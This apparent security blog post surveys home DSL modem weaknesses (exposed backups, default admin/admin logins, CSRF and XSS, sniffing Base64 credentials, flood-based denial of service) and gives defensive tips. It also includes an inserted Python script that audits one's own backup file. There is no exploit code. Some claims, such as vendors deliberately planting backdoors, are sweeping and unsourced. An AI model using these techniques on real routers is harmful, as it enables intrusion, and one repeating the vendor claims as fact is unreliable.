The term DSL modem is technically used to describe "a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot". The more common DSL router, which combines the functions of a DSL modem and a home router, is a standalone device that can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a "residential gateway", a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.<br />
<br />
<a name='more'></a><br />
Most consumer DSL lines use one of several variations of Asymmetric DSL (ADSL). "Asymmetric" here means that more of the line's bandwidth is dedicated to downstream (download) data than to upstream (upload) data. Hence, download rates are faster than upload rates, since most users download much larger quantities of data than they upload. Because telephone lines were never designed to carry such high-frequency signals, DSL is distance-sensitive: the farther the modem is from the switching center, the longer the telephone wires, the weaker the signal, and the lower the data rate the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher-rate service, up to 8 Mbit/s, than the expected rate for the same service in remote areas.<br />
<u><br /></u>
<u>Reference: en.wikipedia.org/wiki/DSL_modem</u></div>
<div style="text-align: left;">
<u><br /></u></div>
<h4 style="text-align: left;">
0x02: Market Share</h4>
<div style="text-align: left;">
Most modem manufacturers are China-based. Research shows that companies like ZTE and Huawei are doing very well and have gained enterprise router share in China over the past year. In China, ZTE placed third in 2013 and 2014, with a dizzying rise this year compared to the popular consortium Cisco (which happens to be more secure). This is also due to the fact that Cisco's products are very costly and difficult for home users to afford. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS3_Ka9d1TMn_maHP-n1ZZK2o8u2-9VNn9505gqsQiyWBV51rwN3opDd-dQRxfLFSspeOTmonjEbw6S1Ny5fp0v8RECXQ17tzgpvxpXjj_do1VwoLeu4RVd7V7nPLSk01YrAve5hsehwax/s1600/huwair.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS3_Ka9d1TMn_maHP-n1ZZK2o8u2-9VNn9505gqsQiyWBV51rwN3opDd-dQRxfLFSspeOTmonjEbw6S1Ny5fp0v8RECXQ17tzgpvxpXjj_do1VwoLeu4RVd7V7nPLSk01YrAve5hsehwax/s1600/huwair.jpg" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]-->
</div>
<div class="MsoNormal">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x03: Backups &amp; Backdoors</h4>
<div class="MsoNormal" style="text-align: left;">
All modems provide a backup file, mainly so that the configuration can be restored to its original state after a reset. However, if the direct link to the backup file is known, the modem is directly in danger: all an attacker has to do is request the backup file and view it, and it usually holds juicy plain-text information such as passwords and the ISP configuration.<br />
<br />
Knowing this, some vendors encrypt the contents of these files so that downloading them is useless to an attacker. That is not the end of the story, however, as many vendors use weak encryption mechanisms for the backup file, and research by white hats such as Osanda Malith shows it: he provided a PoC tool that decrypts these rom-0 (backup) files from most modems, including ZTE and TP-Link.</div>
<div class="MsoNormal" style="text-align: left;">
<br />
Most of the Chinese vendors such as ZTE are banned from the US, first because their products are incredibly insecure and second because they plant malicious backdoors to snoop and eavesdrop on individuals and organizations.<br />
<br />
Many trusted companies such as TP-Link, Huawei and other Chinese companies have a record of placing backdoors in their products. These backdoors normally take the form of open ports which, on connecting, provide a reverse shell. The ports are often high-numbered to make them harder to detect.<br />
<br />
One such example can be found <a href="http://sekurak.pl/more-information-about-tp-link-backdoor/" rel="nofollow" target="_blank">here</a>. This lets them capture sensitive files and sometimes sell them to the countries in which the modems reside. The strategy is a great one for governments wanting to spy on their citizens, and just as useful as part of a cyber attack against a particular country. For example, a country could sell cheap backdoored modems to a target country, and if the modems end up in use on military and other sensitive systems, they have hit the jackpot.</div>
<h4 class="MsoNormal" style="text-align: left;">
0x04: Default Configuration details and Hardcoded Credentials</h4>
<div style="text-align: left;">
Apparently, most if not all modems ship with very easy-to-guess login credentials. In fact, most of them are identical, such as username: admin and password: admin. Most people do not change these details, and most ISPs leave them at the default.<br />
<br />
This is amazingly good news for malicious users: all they have to do is know the vendor, and they can look up the default credentials easily on sites such as http://www.routerpasswords.com/.</div>
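An added audit routine (my own, not the PoC tool the post mentions) that checks a backup file you have downloaded from your own modem for the two problems raised in 0x03 and 0x04: secrets readable in plaintext, and admin/admin-style default credentials still in place. The key=value layout and the field names (web_user, pppoe_password, ...) are assumptions; map them to your vendor's format.

```python
"""Audit a modem/router configuration backup for plaintext secrets and default credentials.

Added example for this post, not the PoC tool it references. The key=value layout and
the field names used in the constructed samples are assumptions.
"""
import hashlib
import math
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Default pairs the post singles out (admin/admin) plus a few other commonly documented ones.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"), ("admin", ""), ("root", "root")}

SECRET_KEY_RE = re.compile(r"pass(word|wd)?|pwd|secret|psk|key", re.I)
USER_KEY_RE = re.compile(r"user(name)?|login|account", re.I)
KEY_VALUE_RE = re.compile(r"([A-Za-z0-9_.\-]+)=([^\r\n\x00]*)")

# Config/English text sits around 4-5 bits per byte; ciphertext approaches 8.
ENCRYPTED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~8.0 for ciphertext or compressed data, far lower for text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_key_values(data: bytes) -> Dict[str, str]:
    """Collect key=value pairs from whatever printable text the blob exposes."""
    text = data.decode("latin-1")  # never fails; binary junk simply will not match
    return {m.group(1): m.group(2) for m in KEY_VALUE_RE.finditer(text)}


def credential_pairs(pairs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Join each user-like field with the secret-like field sharing its prefix (web_user/web_pass)."""
    found = []
    for ukey, uval in pairs.items():
        m = USER_KEY_RE.search(ukey)
        if not m:
            continue
        prefix = ukey[: m.start()]
        for pkey, pval in pairs.items():
            if pkey != ukey and pkey.startswith(prefix) and SECRET_KEY_RE.search(pkey):
                found.append((uval, pval))
    return found


@dataclass
class AuditResult:
    entropy: float
    looks_encrypted: bool
    plaintext_secrets: List[Tuple[str, str]] = field(default_factory=list)
    default_credentials: List[Tuple[str, str]] = field(default_factory=list)

    def findings(self) -> List[str]:
        out = []
        if not self.looks_encrypted:
            out.append(f"backup is not encrypted (entropy {self.entropy:.2f} bits/byte)")
        for key, _ in self.plaintext_secrets:
            out.append(f"secret readable in plaintext: {key}")
        for user, _ in self.default_credentials:
            out.append(f"vendor-default credentials in use for user '{user}'")
        return out


def audit_backup(data: bytes) -> AuditResult:
    entropy = shannon_entropy(data)
    # Caveat: compressed data scores as high as ciphertext, so a high score only means
    # "no plaintext visible", never "secure"; a low score, however, is conclusive.
    looks_encrypted = entropy >= ENCRYPTED_ENTROPY_THRESHOLD
    pairs = parse_key_values(data)
    secrets = [(k, v) for k, v in pairs.items() if SECRET_KEY_RE.search(k) and v]
    defaults = [cred for cred in credential_pairs(pairs) if cred in DEFAULT_CREDENTIALS]
    return AuditResult(entropy, looks_encrypted, secrets, defaults)


# Constructed samples, not real device dumps.
SAMPLE_PLAINTEXT_BACKUP = (
    b"web_user=admin\nweb_pass=admin\n"
    b"pppoe_user=customer1234@isp.example\npppoe_password=Hunter2!\n"
    b"wifi_ssid=HomeNet\nwifi_key=correcthorsebatterystaple\n"
    b"lan_ip=192.168.1.1\n"
)
# Stand-in for a properly encrypted backup: deterministic pseudo-random bytes from SHA-256.
SAMPLE_OPAQUE_BACKUP = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))

if __name__ == "__main__":
    for name, blob in (("plaintext", SAMPLE_PLAINTEXT_BACKUP), ("opaque", SAMPLE_OPAQUE_BACKUP)):
        print(f"{name}: {audit_backup(blob).findings() or ['no findings']}")
```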
<h4 style="text-align: left;">
0x05: XSRF and XSS</h4>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]-->
</div>
<div class="MsoNormal">
These two are two of the most common flaws in the history of web security. Most ZTE modems do not use anti-XSRF tokens (used to prevent CSRF attacks) on any sensitive request.<br />
<br /></div>
<div class="MsoNormal">
XSS is even worse: if someone finds an XSS flaw in a modem (which is likely), they can send that link to a logged-in administrator and perform any action on the admin's behalf, for instance by stealing the XSRF token. An XSS flaw can also allow session hijacking and other browser-based attacks.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
XSRF flaws are more commonly found in modems than XSS because modems use <a href="http://pwntoken.wordpress.com/2014/12/07/required-http-security-inspection-on-application-security/" target="_blank">HTTP</a> authentication most of the time, so the credentials travel in request headers that the browser attaches automatically. Since headers are the main thing the two sides use to communicate, the modem has no way to detect a forged request short of creating anti-CSRF tokens and comparing them on each sensitive request. <br />
<br /></div>
<div class="MsoNormal">
Because of these flaws, or simply because of careless development, it is sometimes possible to trick admins into changing passwords, issuing commands or easing access. </div>
<div class="MsoNormal">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x06: Social Engineering</h4>
<div class="MsoNormal" style="text-align: left;">
What would you say if a caller from a blocked number told you that she is from your ISP and needs your credentials in order to add or maintain the new and revised 3G technology in your modem, or even asks you to help fix security flaws in your modem? You would surely never expect this to be a scam. I mean, why would you? And the next thing you know, she has your configuration password. Knowing this password could mean (since lots of people reuse the same password) that she now has access to your email, financial accounts, etc. </div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<h4 class="MsoNormal" style="text-align: left;">
0x07: Exploit Databases</h4>
<div class="MsoNormal" style="text-align: left;">
Many exploit databases hold juicy info about modems, including default configurations, XSRF/XSS/LFI flaws, logical issues and backdoors. So all you need to do is find the modem version and search exploit databases such as exploit-db.com, 1337day.com, etc.<br />
<br />
Say you found an exploit against a previous version of a modem, but not for the exact version you have. This doesn't necessarily mean yours isn't vulnerable to the particular exploit you found. In fact, most vendors use the same architecture to construct the web interface of their modems, so one XSS on one model could mean XSS on all of that vendor's other modems.</div>
<h4 class="MsoNormal" style="text-align: left;">
0x08: Eavesdropping</h4>
<div class="MsoNormal" style="text-align: left;">
The lack of SSL usually means bad luck for modems, especially in office/public use, because the admin is always at risk when accessing any file from the modem. The reason is that it is very easy to sniff ongoing traffic with tools like Wireshark.<br />
<br />
The fact that modems use login protocols like HTTP authentication puts them in more danger: when any file is requested, the modem asks for the authentication header and the admin's browser responds with the credentials (mostly in Base64 form), which an attacker can easily sniff and decode.<br />
<br />
Even when using SSL (note that very few modems use it), it can still be insecure and even pose more risk. Recently, a lot of attacks have been identified against SSL protocols, Heartbleed and POODLE to name a few. </div>
<h4 class="MsoNormal" style="text-align: left;">
0x09: Denial Of Service</h4>
<div class="MsoNormal" style="text-align: left;">
Denial of Service is one of the most annoying things I can think of, next to a logout CSRF. People with bad intentions can use this type of attack to knock a modem out of delivering internet and sometimes even make the modem reset itself. <br />
<br />
This is really painful for people trying to do their job. The fact that this attack can easily be made untraceable can turn your business day into a big pain just because you chose to use a vulnerable modem.<br />
<br />
Most modems by design don't hold more than 25MB of storage and less than 2MB of RAM, with no DoS protections. This usually means they can handle only a limited amount of data, and take a long time to do it. All an attacker has to do is send more requests than the modem can handle, exhausting its memory and resulting in a DoS.<br />
<h4 class="MsoNormal" style="text-align: left;">
0x10: Lack Of Updates</h4>
Modem users seldom receive updates when critical vulnerabilities have been identified in the wild, and a lot of modems don't have a mechanism for providing OTA (over-the-air) updates. Often users have to upgrade the firmware manually, which of course is not possible for people with little or no technical knowledge. </div>
<h4 class="MsoNormal" style="text-align: left;">
0xA: Suggestions</h4>
<ol style="text-align: left;">
<li>If you are an admin/user of a modem, try not to stay logged in, to make attacks like XSRF, XSS and clickjacking less effective.</li>
<li>Do a little research about the modem model you are about to buy. Search for exploits against it and check whether it uses a secure connection (TLS); if it is vulnerable, why should you buy it? Look for another.</li>
<li>Disable remote access to reduce the attacker's chance of gaining access over the internet; since most modem exploits require LAN access, it is a good idea to disable remote Telnet, web and even FTP access to the modem.</li>
